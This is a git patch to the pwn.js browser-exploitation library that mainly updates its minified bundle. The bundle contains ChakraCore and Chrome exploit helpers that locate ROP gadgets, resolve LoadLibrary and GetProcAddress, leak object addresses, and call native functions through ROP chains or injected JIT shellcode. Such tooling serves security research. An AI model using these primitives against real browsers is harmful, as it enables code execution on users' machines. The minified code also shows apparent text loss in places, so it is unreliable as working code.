From 44838d5946dedc46a8865e5d8053fad72dee701a Mon Sep 17 00:00:00 2001 
From: Brian Pak Date: Sat, 31 Mar 2018 18:25:18 -0700 Subject: [PATCH] Update version and docs. --- dist/pwn.min.js | 7 +- docs/BaseExploit.html | 44 +- docs/BaseExploit_ArrayType.html | 6 +- docs/BaseExploit_CString.html | 6 +- docs/BaseExploit_FunctionType.html | 8 +- docs/BaseExploit_IntType.html | 6 +- docs/BaseExploit_Pointer.html | 16 +- docs/BaseExploit_PointerType.html | 8 +- docs/BaseExploit_StructPointer.html | 6 +- docs/BaseExploit_StructType.html | 6 +- docs/BaseExploit_Type.html | 8 +- docs/BaseExploit_WString.html | 6 +- docs/ChakraExploit.html | 72 +- docs/ChakraExploit_ArrayType.html | 6 +- docs/ChakraExploit_CString.html | 6 +- docs/ChakraExploit_FunctionType.html | 6 +- docs/ChakraExploit_IntType.html | 6 +- docs/ChakraExploit_Pointer.html | 6 +- docs/ChakraExploit_PointerType.html | 6 +- docs/ChakraExploit_StructPointer.html | 6 +- docs/ChakraExploit_StructType.html | 6 +- docs/ChakraExploit_Thread.html | 4 +- docs/ChakraExploit_Type.html | 6 +- docs/ChakraExploit_WString.html | 6 +- docs/ChakraThreadExploit.html | 76 +- docs/ChakraThreadExploit_ArrayType.html | 6 +- docs/ChakraThreadExploit_CString.html | 6 +- docs/ChakraThreadExploit_FunctionType.html | 6 +- docs/ChakraThreadExploit_IntType.html | 6 +- docs/ChakraThreadExploit_Pointer.html | 6 +- docs/ChakraThreadExploit_PointerType.html | 6 +- docs/ChakraThreadExploit_StructPointer.html | 6 +- docs/ChakraThreadExploit_StructType.html | 6 +- docs/ChakraThreadExploit_Thread.html | 4 +- docs/ChakraThreadExploit_Type.html | 6 +- docs/ChakraThreadExploit_WString.html | 6 +- docs/ChromeExploit.html | 2915 +++++++++++++++++++ docs/ChromeExploit_ArrayType.html | 263 ++ docs/ChromeExploit_CString.html | 240 ++ docs/ChromeExploit_FunctionType.html | 240 ++ docs/ChromeExploit_IntType.html | 263 ++ docs/ChromeExploit_Pointer.html | 252 ++ docs/ChromeExploit_PointerType.html | 240 ++ docs/ChromeExploit_StructPointer.html | 252 ++ docs/ChromeExploit_StructType.html | 283 ++ docs/ChromeExploit_Type.html | 
180 ++ docs/ChromeExploit_WString.html | 240 ++ docs/baseexploit.js.html | 33 +- docs/chakraexploit.js.html | 77 +- docs/chakrathreadexploit.js.html | 4 +- docs/chromeexploit.js.html | 296 ++ docs/global.html | 4 +- docs/global.html#Integer | 4 +- docs/index.html | 13 +- docs/integer.js.html | 4 +- package.json | 2 +- 56 files changed, 5948 insertions(+), 260 deletions(-) create mode 100644 docs/ChromeExploit.html create mode 100644 docs/ChromeExploit_ArrayType.html create mode 100644 docs/ChromeExploit_CString.html create mode 100644 docs/ChromeExploit_FunctionType.html create mode 100644 docs/ChromeExploit_IntType.html create mode 100644 docs/ChromeExploit_Pointer.html create mode 100644 docs/ChromeExploit_PointerType.html create mode 100644 docs/ChromeExploit_StructPointer.html create mode 100644 docs/ChromeExploit_StructType.html create mode 100644 docs/ChromeExploit_Type.html create mode 100644 docs/ChromeExploit_WString.html create mode 100644 docs/chromeexploit.js.html
diff --git a/dist/pwn.min.js b/dist/pwn.min.js
index 10ea29d..639041c 100644
--- a/dist/pwn.min.js
+++ b/dist/pwn.min.js
@@ -1 +1,6 @@ -var pwnjs=function(t){var i={};function r(e){if(i[e])return i[e].exports;var n=i[e]={i:e,l:!1,exports:{}};return t[e].call(n.exports,n,n.exports,r),n.l=!0,n.exports}return r.m=t,r.c=i,r.d=function(t,i,e){r.o(t,i)||Object.defineProperty(t,i,{configurable:!1,enumerable:!0,get:e})},r.n=function(t){var i=t&&t.__esModule?function(){return t.default}:function(){return t};return r.d(i,"a",i),i},r.o=function(t,i){return Object.prototype.hasOwnProperty.call(t,i)},r.p="",r(r.s=3)}([function(t,i,r){"use strict";var e=function(){function t(t,i,r,e){this.size=e||64,8==e?(t&=255,r||t<128?i=0:(t|=4294967040,i=4294967295)):16==e?(t&=65535,r||t<32768?i=0:(t|=4294901760,i=4294967295)):32==e&&(i=r||(0|t)>=0?0:4294967295),this.low=0|t,this.high=0|i,this.unsigned=!!r}function i(t){return!0===(t&&t.__isInteger__)}t.prototype.__isInteger__,Object.defineProperty(t.prototype,"__isInteger__",{value:!0,enumerable:!1,configurable:!1}),t.isInteger=i;var r={},e={};function n(t,i){var n,s,o;return i?(o=0<=(t>>>=0)&&t<256)&&(s=e[t])?s:(n=a(t,(0|t)<0?-1:0,!0),o&&(e[t]=n),n):(o=-128<=(t|=0)&&t<128)&&(s=r[t])?s:(n=a(t,t<0?-1:0,!1),o&&(r[t]=n),n)}function s(t,i){if(isNaN(t)||!isFinite(t))return i?p:f;if(i){if(t<0)return p;if(t>=c)return b}else{if(t<=-g)return P;if(t+1>=g)return w}return t<0?s(-t,i).neg():a(t%u|0,t/u|0,i)}function a(i,r,e){return new t(i,r,e)}t.fromInt=n,t.fromNumber=s,t.fromBits=a;var o=Math.pow;function h(t,i,r){if(0===t.length)throw Error("empty string");if("NaN"===t||"Infinity"===t||"+Infinity"===t||"-Infinity"===t)return f;if("number"==typeof i?(r=i,i=!1):i=!!i,(r=r||10)<2||360)throw Error("interior hyphen");if(0===e)return h(t.substring(1),i,r).neg();for(var n=s(o(r,8)),a=f,d=0;d>>0:this.low},E.toNumber=function(){return this.unsigned?(this.high>>>0)*u+(this.low>>>0):this.high*u+(this.low>>>0)},E.toString=function(t){if((t=t||10)<2||36>>0).toString(t);if((a=d).isZero())return u+h;for(;u.length<6;)u="0"+u;h=""+u+h}},E.getHighBits=function(){return 
this.high},E.getHighBitsUnsigned=function(){return this.high>>>0},E.getLowBits=function(){return this.low},E.getLowBitsUnsigned=function(){return this.low>>>0},E.getNumBitsAbs=function(){if(this.isNegative())return this.eq(P)?64:this.neg().getNumBitsAbs();for(var t=0!=this.high?this.high:this.low,i=31;i>0&&0==(t&1<=0},E.isOdd=function(){return 1==(1&this.low)},E.isEven=function(){return 0==(1&this.low)},E.equals=function(t){return i(t)||(t=d(t)),(this.unsigned===t.unsigned||this.high>>>31!=1||t.high>>>31!=1)&&(this.high===t.high&&this.low===t.low)},E.eq=E.equals,E.notEquals=function(t){return!this.eq(t)},E.neq=E.notEquals,E.lessThan=function(t){return this.comp(t)<0},E.lt=E.lessThan,E.lessThanOrEqual=function(t){return this.comp(t)<=0},E.lte=E.lessThanOrEqual,E.greaterThan=function(t){return this.comp(t)>0},E.gt=E.greaterThan,E.greaterThanOrEqual=function(t){return this.comp(t)>=0},E.gte=E.greaterThanOrEqual,E.compare=function(t){if(i(t)||(t=d(t)),this.eq(t))return 0;var r=this.isNegative(),e=t.isNegative();return r&&!e?-1:!r&&e?1:this.unsigned?t.high>>>0>this.high>>>0||t.high===this.high&&t.low>>>0>this.low>>>0?-1:1:this.sub(t).isNegative()?-1:1},E.comp=E.compare,E.negate=function(){return!this.unsigned&&this.eq(P)?P:this.not().add(_)},E.neg=E.negate,E.add=function(t){i(t)||(t=d(t));var r=this.high>>>16,e=65535&this.high,n=this.low>>>16,s=65535&this.low,o=t.high>>>16,h=65535&t.high,u=t.low>>>16,c=0,g=0,l=0,f=0;return l+=(f+=s+(65535&t.low))>>>16,g+=(l+=n+u)>>>16,c+=(g+=e+h)>>>16,c+=r+o,a((l&=65535)<<16|(f&=65535),(c&=65535)<<16|(g&=65535),this.unsigned,this.size)},E.subtract=function(t){return i(t)||(t=d(t)),this.add(t.neg())},E.sub=E.subtract,E.multiply=function(t){if(this.isZero())return f;if(i(t)||(t=d(t)),t.isZero())return f;if(this.eq(P))return t.isOdd()?P:f;if(t.eq(P))return this.isOdd()?P:f;if(this.isNegative())return t.isNegative()?this.neg().mul(t.neg()):this.neg().mul(t).neg();if(t.isNegative())return this.mul(t.neg()).neg();if(this.lt(l)&&t.lt(l))return 
s(this.toNumber()*t.toNumber(),this.unsigned);var r=this.high>>>16,e=65535&this.high,n=this.low>>>16,o=65535&this.low,h=t.high>>>16,u=65535&t.high,c=t.low>>>16,g=65535&t.low,p=0,_=0,y=0,v=0;return y+=(v+=o*g)>>>16,_+=(y+=n*g)>>>16,y&=65535,_+=(y+=o*c)>>>16,p+=(_+=e*g)>>>16,_&=65535,p+=(_+=n*c)>>>16,_&=65535,p+=(_+=o*u)>>>16,p+=r*g+e*c+n*u+o*h,a((y&=65535)<<16|(v&=65535),(p&=65535)<<16|(_&=65535),this.unsigned,this.size)},E.mul=E.multiply,E.divide=function(t){if(i(t)||(t=d(t)),t.isZero())throw Error("division by zero");if(this.isZero())return this.unsigned?p:f;var r,e,n;if(this.unsigned){if(t.unsigned||(t=t.toUnsigned()),t.gt(this))return p;if(t.gt(this.shru(1)))return y;n=p}else{if(this.eq(P))return t.eq(_)||t.eq(v)?P:t.eq(P)?_:(r=this.shr(1).div(t).shl(1)).eq(f)?t.isNegative()?_:v:(e=this.sub(t.mul(r)),n=r.add(e.div(t)));else if(t.eq(P))return this.unsigned?p:f;if(this.isNegative())return t.isNegative()?this.neg().div(t.neg()):this.neg().div(t).neg();if(t.isNegative())return this.div(t.neg()).neg();n=f}for(e=this;e.gte(t);){r=Math.max(1,Math.floor(e.toNumber()/t.toNumber()));for(var a=Math.ceil(Math.log(r)/Math.LN2),h=a<=48?1:o(2,a-48),u=s(r),c=u.mul(t);c.isNegative()||c.gt(e);)c=(u=s(r-=h,this.unsigned)).mul(t);u.isZero()&&(u=_),n=n.add(u),e=e.sub(c)}return n},E.div=E.divide,E.modulo=function(t){return i(t)||(t=d(t)),this.sub(this.div(t).mul(t))},E.mod=E.modulo,E.not=function(){return a(~this.low,~this.high,this.unsigned,this.size)},E.and=function(t){return i(t)||(t=d(t)),a(this.low&t.low,this.high&t.high,this.unsigned,this.size)},E.or=function(t){return i(t)||(t=d(t)),a(this.low|t.low,this.high|t.high,this.unsigned,this.size)},E.xor=function(t){return i(t)||(t=d(t)),a(this.low^t.low,this.high^t.high,this.unsigned,this.size)},E.shiftLeft=function(t){return 
i(t)&&(t=t.toInt()),0==(t&=63)?this:t<32?a(this.low<>>32-t,this.unsigned,this.size):a(0,this.low<>>t|this.high<<32-t,this.high>>t,this.unsigned,this.size):a(this.high>>t-32,this.high>=0?0:-1,this.unsigned,this.size)},E.shr=E.shiftRight,E.shiftRightUnsigned=function(t){if(i(t)&&(t=t.toInt()),0===(t&=63))return this;var r=this.high;return t<32?a(this.low>>>t|r<<32-t,r>>>t,this.unsigned,this.size):a(32===t?r:r>>>t-32,0,this.unsigned,this.size)},E.shru=E.shiftRightUnsigned,E.toSigned=function(){return this.unsigned?a(this.low,this.high,!1,this.size):this},E.toUnsigned=function(){return this.unsigned?this:a(this.low,this.high,!0,this.size)},E.toBytes=function(t){return t?this.toBytesLE():this.toBytesBE()},E.toBytesLE=function(){var t=this.high,i=this.low;return[255&i,i>>>8&255,i>>>16&255,i>>>24&255,255&t,t>>>8&255,t>>>16&255,t>>>24&255]},E.toBytesBE=function(){var t=this.high,i=this.low;return[t>>>24&255,t>>>16&255,t>>>8&255,255&t,i>>>24&255,i>>>16&255,i>>>8&255,255&i]},t}();i.a=e},function(t,i,r){"use strict";var e=r(0);function n(t){var i=t/8,r=t/8,n={},s=[],a=this;function o(t){for(var i=new Uint8Array(t.length+1),r=0;r>>0&255)!=a&&(h>>>8&255)!=a&&(h>>>16&255)!=a&&(h>>>24&255)!=a){o+=3;continue}}for(var d=0;d=0&&i[d]!=r[o+d]);d++);if(d==s)return r.add(o);o+=d}return null},n.prototype.findGadgets=function(t,i){for(var r=this.Uint8Ptr.cast(t),e=this.Uint32Ptr.cast(r.add(60))[0],n=this.Uint32Ptr.cast(t.add(e))[7],s=new Int32Array(n/4),a=r.address.add(4096),o=4096;o{for(var i=t[0],e=t[1],n=0;;){if((n=d.indexOf(e[0],n))<0)throw"missing gadget "+i;for(var s=1;s=0&&d[n+s]!=e[s]);s++);if(s==e.length)break;n++}u[i]=r.add(n)}),u},i.a=n},function(module,__webpack_exports__,__webpack_require__){"use strict";var __WEBPACK_IMPORTED_MODULE_0_baseexploit__=__webpack_require__(1),__WEBPACK_IMPORTED_MODULE_1_integer__=__webpack_require__(0);function ChakraExploit(){var t=this;__WEBPACK_IMPORTED_MODULE_0_baseexploit__.a.call(this,64),this.Thread=function(i){var r=new 
Worker(i);r.onmessage=(i=>{if("CHAKRA_EXPLOIT"==i.data){for(var r=t.globalListFirst.load()[t.threadContextStackLimit].sub(49152).add(1048576),e=t.Uint64Ptr.cast(r).add(-1);!new __WEBPACK_IMPORTED_MODULE_1_integer__.a(1094861636,65536).eq(e.load());)if((e=e.add(-1)).address<=r.sub(65536))throw"unable to find canary";var n=t.Uint64Ptr.cast(e[1]);t.Uint64Ptr.cast(e[2])[7]=n}else if(this.onmessage)return this.onmessage(i)}),this.onmessage=null,this.postMessage=r.postMessage.bind(r)}}ChakraExploit.prototype=Object.create(__WEBPACK_IMPORTED_MODULE_0_baseexploit__.a.prototype),ChakraExploit.prototype.constructor=ChakraExploit,ChakraExploit.prototype.initChakra=function(t){this.chakraBase=this.findModuleBase(t);if(this.gadgets=this.findGadgets(this.chakraBase,[["callLoadLibraryExW",[72,139,200,51,210,65,184,0,8,0,0,255,21]],["jmpGetProcAddress",[72,139,193,72,139,73,8,72,133,201,116,11,72,131,196,40,72,255,37]],["nopReturn",[195]],["popRaxReturn",[88,195]],["popRdxReturn",[90,195]],["popRspReturn",[92,195]],["popRbpReturn",[93,195]],["addRsp58Return",[72,131,196,88,195]],["storeRaxAtRdxReturn",[72,137,2,195]],["entrySlice",[139,248,65,131,-1,2]],["amd64CallFunction",[76,139,78,8,76,139,6,72,131,236,32,255]],["linkToBeginningThreadContext",[72,139,196,76,137,64,24,72,137,80,16,72,137,72,8,72,131,-1,-1,0]],["popRcxRdxR8R9Return",[72,139,76,36,8,72,139,84,36,16,76,139,68,36,24,76,139,76,36,32,72,255,224]],["addRsp28Return",[72,131,196,40,195]]]),this.amd64CallFunctionReturnOffset=208==this.gadgets.amd64CallFunction[12]?13:17,97==this.gadgets.linkToBeginningThreadContext[17])this.threadContextPrev=this.gadgets.linkToBeginningThreadContext[18]/8,this.threadContextNext=this.gadgets.linkToBeginningThreadContext[30]/8,this.globalListFirst=new 
this.PointerType(this.Uint64Ptr).cast(this.Uint64.cast(this.gadgets.linkToBeginningThreadContext).add(27).add(this.Int32Ptr.cast(this.gadgets.linkToBeginningThreadContext.add(23))[0]));else{if(161!=this.gadgets.linkToBeginningThreadContext[17])throw"unsupported version";this.threadContextPrev=this.gadgets.linkToBeginningThreadContext[18]/8,this.threadContextNext=this.gadgets.linkToBeginningThreadContext[33]/8,this.globalListFirst=new this.PointerType(this.Uint64Ptr).cast(this.Uint64.cast(this.gadgets.linkToBeginningThreadContext).add(30).add(this.Int32Ptr.cast(this.gadgets.linkToBeginningThreadContext.add(26))[0]))}for(var i=this.globalListFirst[0],r=0;49152!=(65535&i[r]);r++);this.threadContextStackLimit=r;i=this.gadgets.callLoadLibraryExW.add(17).add(this.Int32Ptr.cast(this.gadgets.callLoadLibraryExW.add(13)).load());this.LoadLibraryExW=new this.PointerType(this.Uint8Ptr).cast(i).load();i=this.gadgets.jmpGetProcAddress.add(23).add(this.Int32Ptr.cast(this.gadgets.jmpGetProcAddress.add(19)).load());if(this.GetProcAddress=new this.PointerType(this.Uint8Ptr).cast(i).load(),this.findStackTop(),this.locateArray=[{}],this.locateArrayPtr=new this.PointerType(this.Uint64Ptr).cast(this.addressOfSlow(this.locateArray))[5].add(3),!this.addressOfSlow(this.locateArray[0]).address.eq(this.locateArrayPtr[0]))throw"init of addressOf failed!"},ChakraExploit.prototype.addressOf=function(t){return this.locateArray[0]=t,this.locateArrayPtr[0]},ChakraExploit.prototype.addressOfArrayBuffer=function(t){var i=new DataView(t);return this.Uint64Ptr.cast(this.addressOf(i))[7]},ChakraExploit.prototype.findStackTop=function(){if(void 0===this.stackTop){if("undefined"!=typeof WorkerGlobalScope)var t=this.globalListFirst.load()[this.threadContextStackLimit],i=1048576;else t=this.globalListFirst.load()[this.threadContextStackLimit],i=10485760;var r=t.sub(49152).add(i);this.stackTop=r}},ChakraExploit.prototype.addressOfSlow=function(obj){var address;return 
eval("String.prototype.slice").call("",{valueOf:()=>{for(var t=this.gadgets,i=this.Uint64Ptr.cast(this.stackTop).add(-1);!this.Uint64.cast(t.entrySlice).eq(i.load());)if((i=i.add(-1)).address<=this.stackTop.sub(65536))throw"unable to find entrySlice";for(;!this.Uint64.cast(t.amd64CallFunction).add(this.amd64CallFunctionReturnOffset).eq(i.load());)if((i=i.add(1)).address>=this.stackTop)throw"unable to find amd64CallFunction";for(;!i[0].eq(new __WEBPACK_IMPORTED_MODULE_1_integer__.a(1111638594,65536))||!i[2].eq(new __WEBPACK_IMPORTED_MODULE_1_integer__.a(1094795585,65536));)if((i=i.add(1)).address>=this.stackTop)throw"unable to find canaries";address=this.Uint8Ptr.cast(i[1])}},0,0,0,obj,1111638594,obj,1094795585),address},ChakraExploit.prototype.customInt32Array=function(t){var i=new Int32Array(1),r=this.Uint64Ptr.cast(this.addressOf(i));return r[4]=2147483647,r[7]=t,i},ChakraExploit.prototype.call=function(address,...args){if(args.length>10)throw"too many arguments";var returnValAddr;return eval("String.prototype.slice").call("",{valueOf:()=>{for(var t=this.gadgets,i=this.Uint64.cast(t.amd64CallFunction).add(this.amd64CallFunctionReturnOffset),r=this.Uint64.cast(t.entrySlice),e=this.stackTop.sub(65536),n=this.customInt32Array(e),s=8184;s>=0&&(r.low!=n[2*s]||r.high!=n[2*s+1]);s-=1);if(0==s)throw"unable to find entrySlice";for(;i.low!=n[2*s]||i.high!=n[2*s+1];)if(8192==++s)throw"unable to find amd64CallFunction";var a=(n=this.Uint64Ptr.cast(e.add(8*s))).add(-2);n=n.add(-16384);var o=this.customInt32Array(n);for(s=32;s>=0;s--){o[4096*s/4]}function h(t,i,r){r=r.address?r.address:__WEBPACK_IMPORTED_MODULE_1_integer__.a.fromValue(r),t[2*i+0]=r.low,t[2*i+1]=r.high}h(o,s=4,t.popRaxReturn),h(o,++s,t.addRsp28Return),h(o,++s,t.popRcxRdxR8R9Return),s++,s++,void 0!==args[0]&&h(o,s,args[0]),s++,void 0!==args[1]&&h(o,s,args[1]),s++,void 0!==args[2]&&h(o,s,args[2]),s++,void 0!==args[3]&&h(o,s,args[3]),h(o,++s,t.nopReturn),h(o,++s,address),h(o,++s,t.addRsp58Return),s++,s+=4,void 
0!==args[4]&&h(o,s,args[4]),s++,void 0!==args[5]&&h(o,s,args[5]),s++,void 0!==args[6]&&h(o,s,args[6]),s++,void 0!==args[7]&&h(o,s,args[7]),s++,void 0!==args[8]&&h(o,s,args[8]),s++,void 0!==args[9]&&h(o,s,args[9]),s++,void 0!==args[10]&&h(o,s,args[10]),h(o,++s,t.popRdxReturn),h(o,++s,n),h(o,++s,t.storeRaxAtRdxReturn),h(o,++s,t.popRaxReturn),h(o,++s,new __WEBPACK_IMPORTED_MODULE_1_integer__.a(0,262144)),h(o,++s,t.popRbpReturn),h(o,++s,a.load()),h(o,++s,t.popRspReturn),h(o,++s,a.add(2)),s++,a[0]=n,returnValAddr=n}}),returnValAddr[0]},__webpack_exports__.a=ChakraExploit},function(t,i,r){"use strict";Object.defineProperty(i,"__esModule",{value:!0});var e=r(1),n=r(2),s=r(4),a=r(5),o=r(0);r.d(i,"BaseExploit",function(){return e.a}),r.d(i,"ChakraExploit",function(){return n.a}),r.d(i,"ChakraThreadExploit",function(){return s.a}),r.d(i,"ChromeExploit",function(){return a.a}),r.d(i,"Integer",function(){return o.a})},function(module,__webpack_exports__,__webpack_require__){"use strict";var __WEBPACK_IMPORTED_MODULE_0_chakraexploit__=__webpack_require__(2),__WEBPACK_IMPORTED_MODULE_1_integer__=__webpack_require__(0);function ChakraThreadExploit(){__WEBPACK_IMPORTED_MODULE_0_chakraexploit__.a.call(this);var dvManager=new DataView(new ArrayBuffer(4096)),dvWorker=new DataView(new ArrayBuffer(4096));this.dvWorker=dvWorker,this.dvManager=dvManager,eval("String.prototype.slice").call("",{valueOf:function(){for(postMessage("CHAKRA_EXPLOIT");0==dvManager.getInt32(0););}},0,0,0,0,1094861636,dvWorker,dvManager,1094795585);var vtable=new 
__WEBPACK_IMPORTED_MODULE_1_integer__.a(dvManager.getInt32(0,!0),dvManager.getInt32(4,!0));this.vtable=vtable,this.chakraBase=this.findModuleBase(vtable),this.initChakra(vtable)}ChakraThreadExploit.prototype=Object.create(__WEBPACK_IMPORTED_MODULE_0_chakraexploit__.a.prototype),ChakraThreadExploit.prototype.constructor=ChakraThreadExploit,ChakraThreadExploit.prototype.read=function(t,i){switch(this.dvManager.setInt32(56,t.low,!0),this.dvManager.setInt32(60,t.high,!0),i){case 8:return new __WEBPACK_IMPORTED_MODULE_1_integer__.a(this.dvWorker.getInt8(0,!0),0,!0);case 16:return new __WEBPACK_IMPORTED_MODULE_1_integer__.a(this.dvWorker.getInt16(0,!0),0,!0);case 32:return new __WEBPACK_IMPORTED_MODULE_1_integer__.a(this.dvWorker.getInt32(0,!0),0,!0);case 64:return new __WEBPACK_IMPORTED_MODULE_1_integer__.a(this.dvWorker.getInt32(0,!0),this.dvWorker.getInt32(4,!0),!0)}},ChakraThreadExploit.prototype.write=function(t,i,r){switch(this.dvManager.setInt32(56,t.low,!0),this.dvManager.setInt32(60,t.high,!0),r){case 8:return this.dvWorker.setInt8(0,0|i.low,!0);case 16:return this.dvWorker.setInt16(0,0|i.low,!0);case 32:return this.dvWorker.setInt32(0,0|i.low,!0);case 64:this.dvWorker.setInt32(0,0|i.low,!0),this.dvWorker.setInt32(4,0|i.high,!0)}},__webpack_exports__.a=ChakraThreadExploit},function(t,i,r){"use strict";var e=r(1);r(0);function n(){e.a.call(this,64)}n.prototype=Object.create(e.a.prototype),n.prototype.constructor=n,n.prototype.initChrome=function(t){this.chromeBase=this.findModuleBase(t);for(var i="",r=0;r<1e3;r++)i+="x["+r+"] += "+Math.random()+";\n";this.jitFunction=new Function("x",i);var e=new 
Array(1e3).fill(0);for(r=0;r<1e4;r++)this.jitFunction(e);this.gadgets=this.findGadgets(this.chromeBase,[["loadLibraryGetProcAddress",[72,141,13,-1,-1,-1,-1,255,21,-1,-1,-1,-1,72,139,248,72,133,192,15,132,-1,-1,-1,-1,72,141,21,-1,-1,-1,-1,72,139,200,255,21,-1,-1,-1,-1]],["mainThreadStack",[72,139,5,-1,-1,-1,-1,72,141,76,36,-1,72,43,193,72,141,29,-1,-1,-1,-1,72,59,5,-1,-1,-1,-1]]]),this.mainThreadStackBase=new this.PointerType(this.Uint64Ptr).cast(this.Uint64.cast(this.gadgets.mainThreadStack).add(7).add(this.Int32Ptr.cast(this.gadgets.mainThreadStack.add(3))[0]))[0],this.LoadLibraryW=new this.PointerType(this.Uint64Ptr).cast(this.Uint64.cast(this.gadgets.loadLibraryGetProcAddress).add(13).add(this.Int32Ptr.cast(this.gadgets.loadLibraryGetProcAddress.add(9))[0]))[0],this.GetProcAddress=new this.PointerType(this.Uint64Ptr).cast(this.Uint64.cast(this.gadgets.loadLibraryGetProcAddress).add(41).add(this.Int32Ptr.cast(this.gadgets.loadLibraryGetProcAddress.add(37))[0]))[0]},n.prototype.addressOf=function(t){var i=[t];return this.Uint64Ptr.cast(this.Uint64Ptr.cast(this.addressOfSlow(i))[2].sub(1))[2].sub(1)},n.prototype.addressOfArrayBuffer=function(t){return this.Uint64Ptr.cast(this.addressOf(t))[4]},n.prototype.addressOfSlow=function(t){var i,r=this.mainThreadStackBase;return t.toString=function(){for(var t=0;t>-4096;t--)if(322507578==r[t-2].high&&322376504==r[t-1].high){i=r[t].sub(1);break}return""},String.prototype.indexOf.call(t,322376504,322507578),i},n.prototype.call=function(t,...i){var r=this;function e(t){return t.high<=32767&&1==(7&t.low)}function n(t,i){return t[0]=72,t[1]=131,t[2]=196,t[3]=i,t.add(4)}function s(t,i){return t[0]=72,t[1]=184,r.Uint64Ptr.cast(t.add(2))[0]=i,t.add(10)}function a(t,i){return t[0]=72,t[1]=185,r.Uint64Ptr.cast(t.add(2))[0]=i,t.add(10)}function o(t,i){return t[0]=72,t[1]=186,r.Uint64Ptr.cast(t.add(2))[0]=i,t.add(10)}function h(t,i){return t[0]=73,t[1]=184,r.Uint64Ptr.cast(t.add(2))[0]=i,t.add(10)}function d(t,i){return 
t[0]=73,t[1]=185,r.Uint64Ptr.cast(t.add(2))[0]=i,t.add(10)}function u(t){return t[0]=80,t.add(1)}var c=this.Uint64Ptr.cast(this.Uint64Ptr.cast(this.addressOf(this.jitFunction))[7].sub(1));if(e(c[0])&&e(c[1])&&e(c[2])&&e(c[3]))var g=this.Uint8Ptr.cast(c).add(96);else g=this.Uint8Ptr.cast(c);var l=this.Uint64Ptr.cast(g.add(512));i.length>4&&1&i.length&&i.push(0);var f=g;f=function(t){return t[0]=85,t[1]=72,t[2]=137,t[3]=229,t[4]=72,t[5]=131,t[6]=228,t[7]=240,t.add(8)}(f=function(t,i){return t[0]=233,r.Int32Ptr.cast(t.add(1))[0]=i,t.add(5)}(f,4096).add(4096));for(var p=i.length-1;p>=0;p--)f=0==p?a(f,i[p]):1==p?o(f,i[p]):2==p?h(f,i[p]):3==p?d(f,i[p]):u(f=s(f,i[p]));return f=function(t){return t[0]=201,t[1]=195,t.add(2)}(f=function(t,i){return t[0]=72,t[1]=163,r.Uint64Ptr.cast(t.add(2))[0]=i,t.add(10)}(f=n(f=function(t){return t[0]=255,t[1]=208,t.add(2)}(f=s(f=n(f,-32),t)),32),l)),this.jitFunction(),l[0]},i.a=n}]); \ No newline at end of file +var pwnjs=function(t){var i={};function r(e){if(i[e])return i[e].exports;var n=i[e]={i:e,l:!1,exports:{}};return t[e].call(n.exports,n,n.exports,r),n.l=!0,n.exports}return r.m=t,r.c=i,r.d=function(t,i,e){r.o(t,i)||Object.defineProperty(t,i,{configurable:!1,enumerable:!0,get:e})},r.n=function(t){var i=t&&t.__esModule?function(){return t.default}:function(){return t};return r.d(i,"a",i),i},r.o=function(t,i){return Object.prototype.hasOwnProperty.call(t,i)},r.p="",r(r.s=3)}([function(t,i,r){"use strict"; +/** + * @license long.js (c) 2013 Daniel Wirtz + * Released under the Apache License, Version 2.0 + * see: https://github.com/dcodeIO/long.js for details + */var e=function(){function t(t,i,r,e){this.size=e||64,8==e?(t&=255,r||t<128?i=0:(t|=4294967040,i=4294967295)):16==e?(t&=65535,r||t<32768?i=0:(t|=4294901760,i=4294967295)):32==e&&(i=r||(0|t)>=0?0:4294967295),this.low=0|t,this.high=0|i,this.unsigned=!!r}function 
i(t){return!0===(t&&t.__isInteger__)}t.prototype.__isInteger__,Object.defineProperty(t.prototype,"__isInteger__",{value:!0,enumerable:!1,configurable:!1}),t.isInteger=i;var r={},e={};function n(t,i){var n,s,o;return i?(o=0<=(t>>>=0)&&t<256)&&(s=e[t])?s:(n=a(t,(0|t)<0?-1:0,!0),o&&(e[t]=n),n):(o=-128<=(t|=0)&&t<128)&&(s=r[t])?s:(n=a(t,t<0?-1:0,!1),o&&(r[t]=n),n)}function s(t,i){if(isNaN(t)||!isFinite(t))return i?p:f;if(i){if(t<0)return p;if(t>=c)return b}else{if(t<=-g)return P;if(t+1>=g)return w}return t<0?s(-t,i).neg():a(t%u|0,t/u|0,i)}function a(i,r,e){return new t(i,r,e)}t.fromInt=n,t.fromNumber=s,t.fromBits=a;var o=Math.pow;function h(t,i,r){if(0===t.length)throw Error("empty string");if("NaN"===t||"Infinity"===t||"+Infinity"===t||"-Infinity"===t)return f;if("number"==typeof i?(r=i,i=!1):i=!!i,(r=r||10)<2||360)throw Error("interior hyphen");if(0===e)return h(t.substring(1),i,r).neg();for(var n=s(o(r,8)),a=f,d=0;d>>0:this.low},E.toNumber=function(){return this.unsigned?(this.high>>>0)*u+(this.low>>>0):this.high*u+(this.low>>>0)},E.toString=function(t){if((t=t||10)<2||36>>0).toString(t);if((a=d).isZero())return u+h;for(;u.length<6;)u="0"+u;h=""+u+h}},E.getHighBits=function(){return this.high},E.getHighBitsUnsigned=function(){return this.high>>>0},E.getLowBits=function(){return this.low},E.getLowBitsUnsigned=function(){return this.low>>>0},E.getNumBitsAbs=function(){if(this.isNegative())return this.eq(P)?64:this.neg().getNumBitsAbs();for(var t=0!=this.high?this.high:this.low,i=31;i>0&&0==(t&1<=0},E.isOdd=function(){return 1==(1&this.low)},E.isEven=function(){return 0==(1&this.low)},E.equals=function(t){return i(t)||(t=d(t)),(this.unsigned===t.unsigned||this.high>>>31!=1||t.high>>>31!=1)&&(this.high===t.high&&this.low===t.low)},E.eq=E.equals,E.notEquals=function(t){return!this.eq(t)},E.neq=E.notEquals,E.lessThan=function(t){return this.comp(t)<0},E.lt=E.lessThan,E.lessThanOrEqual=function(t){return 
